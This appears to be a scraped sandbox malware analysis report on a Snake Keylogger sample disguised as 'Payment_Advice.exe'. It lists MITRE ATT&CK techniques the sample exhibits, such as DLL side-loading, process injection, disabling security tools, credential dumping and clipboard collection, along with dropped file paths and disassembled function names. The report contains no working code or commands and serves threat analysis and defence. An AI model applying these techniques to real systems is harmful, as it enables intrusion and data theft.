Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_Advice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lci5lel0.4m2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uskty4tf.nv4.ps1

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afsbende.Tid

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\lokalplanrammes.sus

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\ondskabsfuldhedernes.txt

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl

C:\Users\user\AppData\Local\Temp\nspC30E.tmp

Windows Analysis Report
Payment_Advice.exe

Function 00403358 Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 335
stringfilecomCOMMON

Function 004052D1 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Function 00405F0A Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Function 00405770 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 0040317B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre